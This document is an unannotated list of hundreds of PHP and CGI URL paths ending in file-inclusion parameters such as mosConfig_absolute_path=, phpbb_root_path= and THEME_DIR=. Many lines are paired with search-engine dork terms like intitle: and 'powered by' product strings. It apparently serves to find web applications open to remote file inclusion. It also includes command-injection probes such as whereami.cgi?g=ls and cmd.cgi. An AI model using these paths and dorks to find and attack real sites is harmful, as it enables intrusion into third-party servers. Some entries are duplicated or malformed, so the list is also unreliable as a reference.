  include.php?redirect=
  print.php?itemnav=
  enter.php?index=
  print.php?middle=
  sitio.php?goFile=
  head.php?include=
  enter.php?e=
  index.php?play=
  enter.php?id=
  view.php?mod=
  show.php?nivel=
  file.php?channel=
  layout.php?choix=
  info.php?body=
  include.php?go=
  index3.php?nivel=
  sub*.php?include=
  path.php?numero=
  principal.php?header=
  main.php?opcion=
  enter.php?s=
  sub*.php?pre=
  include.php?index=
  gery.php?pageweb=
  padrao.php?path=
  info.php?url=
  press.php?ev=
  index1.php?pg=
  print.php?in=
  general.php?modo=
  head.php?ki=
  press.php?my=
  index1.php?pollname=
  principal.php?to=
  default.php?play=
  page.php?g=
  nota.php?pg=
  blank.php?destino=
  blank.php?z=
  components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  module_db.php?pivot_path= module_db.php?pivot_path="
  /classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir="
  components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  com_extended_registration
  smarty_config.php?root_dir= "smarty"
  include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
  send_reminders.php?includedir= "send_reminders.php?includedir="
  components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
  inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
  /components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg"
  [Script Path]/admin/index.php?o= admin/index.php";
  /admin/index.php?o= admin/index.php";
  /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
  /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
  admin/doeditconfig.php?thispath=../includes&config[path]= "admin"
  /components/com_simpleboard/image_upload.php?sbp= com_simpleboard"
  components/com_simpleboard/image_upload.php?sbp= com_simpleboard"
  /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine                                                                                                  
  mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
  zentrack/index.php?configFile=
  inst/index.php?lng=../../include/main.inc&G_PATH=
  pivot/modules/module_db.php?pivot_path=
  include/write.php?dir=
  includes/header.php?systempath=
  becommunity/community/index.php?pageurl=
  agendax/addevent.inc.php?agendax_path=
  myPHPCalendar/admin.php?cal_dir=
  yabbse/Sources/Packages.php?sourcedir=
  zboard/zboard.php
  path_of_cpcommerce/_functions.php?prefix
  dotproject/modules/projects/addedit.php?root_dir=
  dotproject/modules/projects/view.php?root_dir=
  dotproject/modules/projects/vw_files.php?root_dir=
  dotproject/modules/tasks/addedit.php?root_dir=
  dotproject/modules/tasks/viewgantt.php?root_dir=
  My_eGery/public/displayCategory.php?basepath=
  modules/My_eGery/public/displayCategory.php?basepath=
  modules/4nAlbum/public/displayCategory.php?basepath=
  modules/coppermine/themes/default/theme.php?THEME_DIR=
  modules/agendax/addevent.inc.php?agendax_path=
  modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
  modules/xgery/upgrade_album.php?GERY_BASEDIR=
  modules/coppermine/include/init.inc.php?CPG_M_DIR=
  shoutbox/expanded.php?conf=
  library/editor/editor.php?root=
  library/lib.php?root=
  e107/e107_handlers/secure_img_render.php?p=
  main.php?x=
  *default.php?page=
  *default.php?body=
  *index.php?url=
  *index.php?arquivo=
  index.php?include=
  index.php?visualizar=
  index.php?pagina=
  index.php?page=
  index.php?p=
  index.php?cont=
  index.php?x=
  index.php?cat=
  index.php?site=
  index.php?configFile=
  index.php?do=
  index2.php?x=
  Index.php?id=
  template.php?pagina
  inc/step_one_tables.php?server_inc=
  GradeMap/index.php?page=
  admin.php?cal_dir=
  path_of_cpcommerce/_functions.php?prefix=
  contacts.php?cal_dir=
  convert-date.php?cal_dir=
  album_portal.php?phpbb_root_path=
  mainfile.php?MAIN_PATH=
  dotproject/modules/files/index_table.php?root_dir=
  gery/init.php?HTTP_POST_VARS=
  pm/lib.inc.php?pm_path=
  ideabox/include.php?gorumDir=
  cgi-bin/index.cgi?page=
  cgi-bin/awstats.pl?update=1&logfile=
  cgi-bin/awstats/awstats.pl?configdir
  cgi-bin/ikonboard.cgi
  cgi-bin/acart/acart.pl?&page=
  cgi-bin/quikstore.cgi?category=
  cgi-bin/ubb/ubb.cgi?g=
  cgi-bin/hinsts.pl?                   
  cgi-bin/bp/bp-lib.pl?g=              
  ccbill/whereami.cgi?g=ls
  cgi-bin/telnet.cgi                                  
  cgi-bin/1/cmd.cgi
  calendar.pl?command=login&fromTemplate=
  encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
  events.cgi?t=
  powerup.cgi?a=latest&t=
  lc.cgi?a=
  news.cgi?a=114&t=
  biznews.cgi?a=33&t=
  jobs.cgi?a=9&t=
  articles.cgi?a=34&t=
  events.cgi?a=155&t=
  latinbitz.cgi?t=
  newsdesk.cgi?t=
  media.cgi?a=11&t=
  reporter.cgi?t=
  news.cgi?t=
  newsupdate.cgi?a=latest&t=
  deportes.cgi?a=latest&t=
  news.cgi?a=latest&t=
  whereami.cgi?g=id
  auktion.pl?menue=
  i-m/i-m.cgi?p=
  vote.pl?action=show&id=
  shop.pl/page=
  newsdesk.cgi?a=latest&t=
  fileseek.cgi?head=&foot=
  cgi-bin/probe.cgi?olddat=
  emsgb/easymsgb.pl?print=
  app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=
  csv_db/csv_db.cgi?fil e=file.extention
  cgi-bin/jammail.pl?job=showoldmail&mail=
  cgi-bin/bbs/read.cgi?file=
  support_page.cgi?file_name=          
  index.php?include=
  index.php?open=
  index.php?visualizar=
  main.php?x=
  main.php?page=
  index.php?meio.php=
  index.php?page=
  index.php?action=
  index5.php?configFile=
  index5.php?page=
  index5.php?content=
  index5.php?x=
  index5.php?open=
  index5.php?m=
  index5.php?site=
  index5.php?cat=
  index.php?d=
  index.php?a=
  index.php?b=
  index.php?c=
  index.php?e=
  index.php?f=
  index.php?g=
  index.php?h=
  index.php?i=
  index.php?j=
  index.php?k=
  index.php?l=
  index.php?m=
  index.php?n=
  index.php?o=
  index.php?p=
  index.php?q=
  index.php?r=
  index.php?s=
  index.php?t=
  index.php?u=
  index.php?v=
  index.php?x=
  index.php?y=
  index.php?z=
  index.php?loc=
  index.php?seite=
  index2.php?d=
  index2.php?a=
  index.php?ir=
  index.php?secao=
  index2.php?b=
  index2.php?c=
  index2.php?e=
  index2.php?f=
  index2.php?g=
  index2.php?h=
  index2.php?i=
  index2.php?j=
  index2.php?k=
  index2.php?l=
  index2.php?m=
  index2.php?n=
  index2.php?o=
  index2.php?p=
  index2.php?q=
  index2.php?r=
  index2.php?s=
  index2.php?t=
  index2.php?u=
  index2.php?v=
  index2.php?x=
  index2.php?y=
  index2.php?z=
  index5.php?inc=
  index5.php?pg=
  index5.php?lv1=
  index.php?sub=
  index.php?sub2=
  index.php?pg=
  index.php?lv1=
  index.php?directfile=
  index.php?funcion=
  index.php?ll=
  index.php?lnk=
  index5.php?main=
  index5.php?include=
  index5.php?root=
  index5.php?pagina=
  index.php?theme=
  index.php?acao=
  index5.php?cont=
  index5.php?pag=
  index5.php?p=
  index5.php?lang=
  index5.php?language=
  template.php?pagina=
  llindex.php?sub=
  index2.php?pg=
  index2.php?lv1=
  index2.php?sub=
  index2.php?directfile=
  index2.php?funcion=
  index2.php?sub2=
  index2.php?ll=
  index2.php?lnk=
  index5.php?body=
  index5.php?visualizar=
  index5.php?do=
  index2.php?theme=
  index2.php?acao=
  index2:php?aa=
  index3:php?aa=
  index.php?server=
  index.php?cal=
  index.php?prefix=
  index.php?root_PATH=
  index.php?path=
  index.php?gorumdir=
  index2.php?cont=
  index2.php?server=
  index2.php?cal=
  index2.php?prefix=
  index2.php?root_PATH=
  index2.php?path= AKI
  exibir.php?abre=
  exibir.php?page=
  exibir.php?get=
  exibir.php?p=
  exibir.php?lang=
  index2.php?gorumdir=
  index2.php?pag=
  index2.php?lang=
  index2.php?language=
  index2.php?content=
  index.php?middle=
  step_one_tables.php?server_inc=
  grademade/index.php?page=
  phpshop/index.php?base_dir=
  admin.php?cal_dir=
  _functions.php?prefix=
  contacts.php?cal_dir=
  convert-date.php?cal_dir=
  album_portal.php?phpbb_root_path=
  mainfile.php?MAIN_PATH=
  index_table.php?root_dir=
  affich.php?base=
  init.php?HTTP_POST_VARS=
  lib.inc.php?pm_path=
  include.php?gorumDir=
  start_lobby.php?CONFIG[MWCHAT_Libs]=
  index.php?configFile=
  module_db.php?pivot_path=
  index.php?lng=../../include/main.inc&G_PATH=
  initdb.php?absolute_path=
  step_one.php?server_inc=
  pipe.php?HCL_path=
  write.php?dir=
  new-visitor.inc.php?lvc_include_dir=
  header.php?systempath=
  theme.php?THEME_DIR=
  index.php?pageurl=
  expanded.php?conf=
  addevent.inc.php?agendax_path=
  Packages.php?sourcedir=
  _functions.php?prefix
  addedit.php?root_dir=
  view.php?root_dir=
  vw_files.php?root_dir=
  viewgantt.php?root_dir=
  displayCategory.php?basepath=
  default/theme.php?THEME_DIR=
  upgrade_album.php?GERY_BASEDIR=
  init.inc.php?CPG_M_DIR=
  mod_mainmenu.php?mosConfig_absolute_path=
  editor.php?root=
  lib.php?root=
  secure_img_render.php?p=
  default.php?page=
  arquivo.php?data=
  word.php?id=
  mod.php?mod=
  index.php?plugin=
  sendpage.php?page=
  index.php?hl=
  modules.php?op=
  index.php?templateid=
  article.php?sid=
  .php?my="
  .php?a="
  .php?f="
  .php?z="
  .php?zo="
  .php?la="
  .php?perm="
  .php?item_id="
  .php?f_content="
  .php?from="
  .php?mid="
  .php?lest="
  .php?east="
  .gov.br/index.php?arquivo=
  index.php?ver=
  /contenido/classes/class.inuse.php
  news.php?CONFIG[script_path]=
  index.php?vpagina=
  index.php?arq=
  index.php?pg_ID=
  index.php?pg=
  home.php?page=
  */newbb/print.php?forum=*topic_id=*"
  */newbb_plus/*="
  */news/archive.php?op=*year=*month=*"
  .php?abrir="
  .php?act="
  .php?action="
  .php?ad="
  .php?archive="
  .php?area="
  .php?article="
  .php?b="
  */tsep/include/colorswitch.php?tsep_config[absPath]=*"
  .php?back="
  .php?base="
  .php?basedir="
  .php?bbs="
  .php?board_no="
  .php?body="
  .php?c="
  .php?cal_dir="
  .php?cat="
  /include/init.inc.php?CPG_M_DIR="
  /includes/mx_functions_ch.php?phpbb_root_path="
  /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]="
  .php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path="
  .php?subd="
  .php?subdir="
  .php?category="
  .php?choice="
  .php?class="
  .php?club_id="
  .php?cod.tipo="
  .php?cod="
  .php?conf="
  .php?configFile="
  .php?cont="
  .php?corpo="
  .php?cvsroot="
  .php?d="
  .php?da="
  .php?date="
  .php?debug="
  .php?debut="
  .php?default="
  .php?destino="
  .php?dir="
  .php?display="
  .php?file_id="
  .php?file="
  .php?filepath="
  .php?flash="
  .php?folder="
  .php?for="
  .php?form="
  .php?formatword="
  .php?funcao="
  .php?function="
  .php?g="
  .php?get="
  .php?go="
  .php?gorumDir="
  .php?goto="
  .php?h="
  .php?headline="
  .php?i="
  .php?inc="
  .php?include="
  .php?includedir="
  .php?inter="
  .php?itemid="
  .php?j="
  .php?join="
  .php?jojo="
  .php?l="
  .php?lan="
  .php?lang="
  .php?link="
  .php?load="
  .php?loc="
  .php?m="
  .php?main="
  .php?meio.php="
  .php?meio="
  .php?menu="
  .php?menuID="
  .php?mep="
  .php?month="
  .php?mostra="
  .php?n="
  .php?name="
  .php?nav="
  .php?new="
  .php?news="
  .php?next="
  .php?nextpage="
  .php?o="
  .php?op="
  .php?open="
  .php?option="
  .php?origem="
  .php?Page_ID="
  .php?pageurl="
  .php?para="
  .php?part="
  .php?pg="
  .php?pid="
  .php?place="
  .php?play="
  .php?plugin="
  .php?pm_path="
  .php?pollname="
  .php?post="
  .php?pr="
  .php?prefix="
  .php?prefixo="
  .php?q="
  .php?redirect="
  .php?ref="
  .php?refid="
  .php?regionId="
  .php?release_id="
  .php?release="
  .php?return="
  .php?root="
  .php?S="
  .php?searchcode_id="
  .php?sec="
  .php?secao="
  .php?sect="
  .php?sel="
  .php?server="
  .php?servico="
  .php?sg="
  .php?shard="
  .php?show="
  .php?sid="
  .php?site="
  .php?sourcedir="
  .php?start="
  .php?storyid="
  .php?str="
  .php?subject="
  .php?sufixo="
  .php?systempath="
  .php?t="
  .php?task="
  .php?teste="
  .php?theme_dir="
  .php?thread_id="
  .php?tid="
  .php?title="
  .php?to="
  .php?topic_id="
  .php?type="
  .php?u="
  .php?url="
  .php?urlFrom="
  .php?v="
  .php?var="
  .php?vi="
  .php?view="
  .php?visual="
  .php?wPage="
  .php?y="
  /components/com_forum/download.php?phpbb_root_path= com_forum
  [Script Path]/admin/index.php?o= admin/index.php"
  /admin/index.php?o= admin/index.php"
  index.php?menu=deti&page= index.php?menu=deti&page"
  include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
  /classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"
  components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
  index.php?RP_PATH= reviewpost
  index.php?pagename= phpquiz
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
  /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
  components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
  /tools/send_reminders.php?includedir= day.php?date=
  SQuery/lib/gore.php?libpath= "/SQuery/"
  m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
  wamp_dir/setup/yesno.phtml?no_url= "setup"
  components/com_forum/download.php?phpbb_root_path= "com_forum"
  index.php?p= "/index.php?p=*.php"
  index.php?pag= "/index.php?pag=*.php"
  template.php?page= "/template.php?page=*.php"
  main.php?page= "/main.php?page=*.php"
  index2.php?pag= "/index2.php?pag=*.php"
  home.php?pag= "/home.php?pag=*.php"
  index.php?page= "/index.php?page=*.php"
  default.php?page= "/default.php?page=*.php"
  inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"
  /modules/vwar/admin/admin.php?vwar_root= vwar
  bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
  encapscms_PATH/core/core.php?root= encapscms_PATH
  inc/session.php?sessionerror=0&lang= inc
  path/index.php?function=custom&custom= path
  [MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]
  /inc/irayofuncs.php?irayodirhack= "/inc/"
  index.php?function=custom&custom= custom
  cyberfolio/portfolio/msg/view.php?av= cyberfolio
  /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT
  *mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
  *pivot/modules/module_db.php?pivot_path=
  *inc/header.php/step_one.php?server_inc=
  *inst/index.php?lng=../../include/main.inc&G_PATH=
  *inc/pipe.php?HCL_path=
  *include/new-visitor.inc.php?lvc_include_dir=
  *includes/header.php?systempath=
  *support/mailling/maillist/inc/initdb.php?absolute_path=
  *coppercop/theme.php?THEME_DIR=
  *zentrack/index.php?configFile=
  *include/write.php?dir=
  include/new-visitor.inc.php?lvc_include_dir=
  includes/header.php?systempath=
  support/mailling/maillist/inc/initdb.php?absolute_path=
  coppercop/theme.php?THEME_DIR=
  becommunity/community/index.php?pageurl=
  shoutbox/expanded.php?conf=
  agendax/addevent.inc.php?agendax_path=
  myPHPCalendar/admin.php?cal_dir=
  yabbse/Sources/Packages.php?sourcedir=
  zboard/zboard.php
  path_of_cpcommerce/_functions.php?prefix
  dotproject/modules/tasks/viewgantt.php?root_dir=
  My_eGery/public/displayCategory.php?basepath=
  modules/My_eGery/public/displayCategory.php?basepath=
  modules/4nAlbum/public/displayCategory.php?basepath=
  modules/coppermine/themes/default/theme.php?THEME_DIR=
  modules/agendax/addevent.inc.php?agendax_path=
  modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
  modules/xgery/upgrade_album.php?GERY_BASEDIR=
  modules/coppermine/include/init.inc.php?CPG_M_DIR=
  modules/mod_mainmenu.php?mosConfig_absolute_path=
  pivot/modules/module_db.php?pivot_path=
  library/editor/editor.php?root=
  library/lib.php?root=
  e107/e107_handlers/secure_img_render.php?p=
  main.php?x=
  main.php?page=
  *default.php?page=
  *default.php?body=
  default.php?page=
  *index.php?url=
  *index.php?arquivo=
  index.php?meio.php=
  index.php?include=
  index.php?open=
  index.php?visualizar=
  index.php?pagina=
  index.php?inc=
  index.php?page=
  index.php?pag=
  index.php?p=
  index.php?content=
  index.php?cont=
  index.php?c=
  index.php?meio=
  index.php?x=
  index.php?cat=
  index.php?site=
  index.php?configFile=
  index.php?action=
  index.php?do=
  index2.php?x=
  Index.php?id=
  index2.php?content=
  template.php?pagina
  inc/step_one_tables.php?server_inc=
  phpshop/index.php?base_dir=
  admin.php?cal_dir=
  path_of_cpcommerce/_functions.php?prefix=
  contacts.php?cal_dir=
  convert-date.php?cal_dir=
  album_portal.php?phpbb_root_path=
  mainfile.php?MAIN_PATH=
  dotproject/modules/files/index_table.php?root_dir=
  html/affich.php?base=
  gery/init.php?HTTP_POST_VARS=
  pm/lib.inc.php?pm_path=
  ideabox/include.php?gorumDir=
  modules/tasks/viewgantt.php?root_dir=
  cgi-bin/index.cgi?page=
  cgi-bin/awstats.pl?update=1&logfile=
  cgi-bin/awstats/awstats.pl?configdir
  cgi-bin/ikonboard.cgi
  cgi-bin/acart/acart.pl?&page=
  cgi-bin/quikstore.cgi?category=
  cgi-bin/ubb/ubb.cgi?g=
  cgi-bin/hinsts.pl?
  cgi-bin/bp/bp-lib.pl?g=
  ccbill/whereami.cgi?g=ls
  cgi-bin/telnet.cgi
  cgi-bin/1/cmd.cgi
  encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
  cgi-sys/guestbook.cgi?user=cpanel&template=
  account.php?action= account.php?action=
  account.php?action= iurl:"account.php?action="
  account.php?action= iurl:".php?action="
  account.php?action= .php?action=
  accounts.php?command= .php?command="
  addmedia.php?factsfile[$LANGUAGE]= phpGedView
  .php?p="
  announcements.php?phpraid_dir= "phpraid"
  announcements.php?phpraid_dir= "phpraid signup"
  announcements.php?phpraid_dir= php raid
  announcements.php?phpraid_dir= phpraid
  announcements.php?phpraid_dir= phpraid signup
  arg.php?arg= .php?arg=
  args.php?arg= .php?arg=
  atom.php5?page= .php5?id=
  auto.php?inc= .php?inc="
  auto.php?page= auto.php?page=
  base.php?f1= base.php?f1="
  base.php?f1= .php?f1="
  board.php?see= board.php?see="
  board.php?see= .php?see="
  book.php5?page= php5?page=
  /calendar.php?l= calendar.php?l="
  /calendar.php?l= calendar.php?l=
  /calendar.php?p= calendar.php?p="
  /calendar.php?p= calendar.php?p=
  /calendar.php?pg= calendar.php?pg="
  /calendar.php?pg= calendar.php?pg=
  /calendar.php?s= calendar.php?s="
  /calendar.php?s= calendar.php?s=
  /addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/"
  /addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/
  /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
  /addpost_newpoll.php?addpoll=preview&thispath= "ubbthreads"
  /addpost_newpoll.php?addpoll=preview&thispath= ubbthreads
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository"
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "Mambo"
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo
  /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat
  /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= "com_serverstat"
  canal.php?meio= .php?meio="
  /classes/adodbt/sql.php?classes_dir= "adobt"
  /classes/adodbt/sql.php?classes_dir= adobt
  /classes/adodbt/sql.php?classes_dir= adobt
  /classified_right.php?language_dir= "classified.php"
  /classified_right.php?language_dir= classified.php
  /classified_right.php?language_dir= classified.php phpbazar
  /classified_right.php?language_dir= "phpbazar"
  /classified_right.php?language_dir= phpbazar
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN"
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN 1.2.3"
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3
  /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
  /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= "com_extended_registration"
  /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
  /components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms"
  /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms"
  /components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms
  components/com_performs/performs.php?mosConfig_absolute_path= com_performs
  components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
  /components/com_zoom/includes/database.php?mosConfig_absolute_path= "com_zoom"
  /components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom
  /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
  content.php?page= "content.php?page=*.php"
  /embed/day.php?path= "Calendar"
  /embed/day.php?path= Calendar
  /embed/day.php?path= intitle:"Login to Calendar"
  /embed/day.php?path= "Login to Calendar"
  /embed/day.php?path= Login to Calendar
  /embed/day.php?path= "WebCalendar"
  /embed/day.php?path= WebCalendar
  enc/content.php?Home_Path= "doodle"
  enc/content.php?Home_Path= doodle
  enc/content.php?Home_Path= "doodle cart"
  enc/content.php?Home_Path= doodle cart
  enc/content.php?Home_Path= "powered by doodle cart"
  enc/content.php?Home_Path= powered by doodle cart
  /header.php?abspath= "MobilePublisherPHP"
  /header.php?abspath= MobilePublisherPHP
  impex/ImpExData.php?systempath= intext:powered by vbulletin
  impex/ImpExData.php?systempath= powered by vbulletin
  impex/ImpExData.php?systempath= "vbulletin"
  impex/ImpExData.php?systempath= vbulletin
  /includes/dbal.php?eqdkp_root_path= "EQdkp"
  /includes/dbal.php?eqdkp_root_path= EQdkp
  /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
  /includes/dbal.php?eqdkp_root_path= powered by EQdkp
  /includes/kb_constants.php?module_root_path= "Base"
  /includes/kb_constants.php?module_root_path= Base
  /includes/kb_constants.php?module_root_path= "Knowledge"
  /includes/kb_constants.php?module_root_path= Knowledge
  /includes/kb_constants.php?module_root_path= "Knowledge Base"
  /includes/kb_constants.php?module_root_path= Knowledge Base
  /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
  /includes/kb_constants.php?module_root_path= Powered by Knowledge Base
  index1.php?= "index1.php?="
  index1.php?= index1.php?=
  index1.php?= "index1.php?=*.php?
  index2.php?= "index2.php?="
  index2.php?= index2.php?=
  index2.php?= "index2.php?=*.php?"
  index.php?body= index.php?body=
  index.php?body= "index.php?body="
  index.php?go1= index.php?go1=
  index.php?go1= "index.php?go1="
  index.php?go= "index.php?go="
  index.php?go= index.php?go=
  index.php?pageurl= "index.php?pageurl="
  index.php?pageurl= "index.php?pageurl=*.php"
  index.php?pageurl= index.php?pageurl=*.php
  index.php?pageurl= "index.php?pageurl=*.php
  index.php?pagina1= "index.php?pagina1="
  index.php?pagina1= index.php?pagina1=
  index.php?pagina= "index.php?pagina="
  index.php?pagina= "index.php?pagina=*.php"
  index.php?site1= index.php?site1=
  index.php?site1= "index.php?site1="
  index.php?site= "index.php?site="
  index.php?site= index.php?site=
  index.php?var1= "index.php?var1="
  index.php?var1= index.php?var1=
  index.php?var2= index.php?var2=
  index.php?var= index.php?va21=
  index.php?var= index.php?var=
  index.php?var= "index.php?var1="
  index.php?var= index.php?var1=
  index.php?var= "index.php?var2="
  index.php?var= index.php?var2=
  index.php?var= "index.php?var=*.php"
  index.php?var= index.php?var=*.php
  /login.php?dir= login.php?dir=
  /login.php?dir= "login.php?dir="
  /login.php?dir= login.php?dir=
  main.php?id= "main.php?id=*.php"
  /main.php?sayfa= "main.php?sayfa="
  /main.php?sayfa= main.php?sayfa=
  /mcf.php?content= mcf.php"
  mcf.php?content= mcf.php"
  mcf.php?content= "mcf.php"
  mcf.php?content= mcf.php
  /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
  /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
  /modules/TotalCalendar/about.php?inc_dir= "TotalCalendar"
  /modules/TotalCalendar/about.php?inc_dir= TotalCalendar
  /modules/vwar/admin/admin.php?vwar_root= "vwar"
  /modules/vwar/admin/admin.php?vwar_root= vwar
  phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "index.php?id="
  phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=
  phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
  phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=
  skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer"
  skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer
  skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
  skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
  skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "CMS"
  skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
  /skin/zero_vote/error.php?dir= "skin/zero_vote/error.php"
  /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
  /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
  /sources/functions.php?CONFIG[main_path]= "Powered By ScozNews"
  /sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)
  /sources/functions.php?CONFIG[main_path]= Powered By ScozNews
  /sources/functions.php?CONFIG[main_path]= "ScozNews"
  /sources/functions.php?CONFIG[main_path]= ScozNews
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Aardvark"
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Aardvark TopSites"
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark TopSites
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2
  /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
  /sources/template.php?CONFIG[main_path]= (Powered By ScozNews)
  /sources/template.php?CONFIG[main_path]= Powered By ScozNews
  /sources/template.php?CONFIG[main_path]= "ScozNews"
  /sources/template.php?CONFIG[main_path]= ScozNews
  /surveys/survey.inc.php?path= surveys
  /surveys/survey.inc.php?path= "surveys"
  /tags.php?BBCodeFile= intitle:"Tagger LE"
  /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
  /tags.php?BBCodeFile= "Tagger LE"
  /tags.php?BBCodeFile= Tagger LE
  /tags.php?BBCodeFile= "tags.php"
  /tags.php?BBCodeFile= tags.php
  /templates/headline_temp.php?nst_inc= intitle:fusion:news:management
  /templates/headline_temp.php?nst_inc= 'fusion"
  /templates/headline_temp.php?nst_inc= "fusion"
  /templates/headline_temp.php?nst_inc= fusion
  /templates/headline_temp.php?nst_inc= fusion:news:management:system
  /templates/headline_temp.php?nst_inc= "management"
  /templates/headline_temp.php?nst_inc= management
  /templates/headline_temp.php?nst_inc= "news"
  /templates/headline_temp.php?nst_inc= news
  /templates/headline_temp.php?nst_inc= "system"
  /templates/headline_temp.php?nst_inc= system
  /tools/send_reminders.php?includedir= "day.php?date="
  /tools/send_reminders.php?includedir= day.php?date=
  /ws/get_events.php?includedir= /WebCalendar/
  /ws/get_events.php?includedir= "/WebCalendar/"
  /ws/get_events.php?includedir= "WebCalendar"
  /zipndownload.php?PP_PATH= "PhotoPost"
  /zipndownload.php?PP_PATH= PhotoPost
  /zipndownload.php?PP_PATH= "PhotoPostP"
  /zipndownload.php?PP_PATH= "PhotoPost PHP"
  /zipndownload.php?PP_PATH= "PhotoPost PHP 4.6"
  /zipndownload.php?PP_PATH= PhotoPost PHP 4.6
  /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
  /zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
  cmd.php?arg= .php?arg=
  /codebb/lang_select?phpbb_root_path= codebb
  /codebb/lang_select?phpbb_root_path= codebb 1.1b3
  components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery
  components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery
  components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php
  content.php?inc= .php?inc="
  content.php?seite= content.php?seite=
  content.php?seite= .php?seite=
  dbase.php?action= dbase.php
  dbase.php?action= dbase.php?action=
  dbase.php?action= .php?action=
  default.php?arquivo= .php?arquivo=
  default.php?vis= .php?vis="
  define.php?term= .php?term="
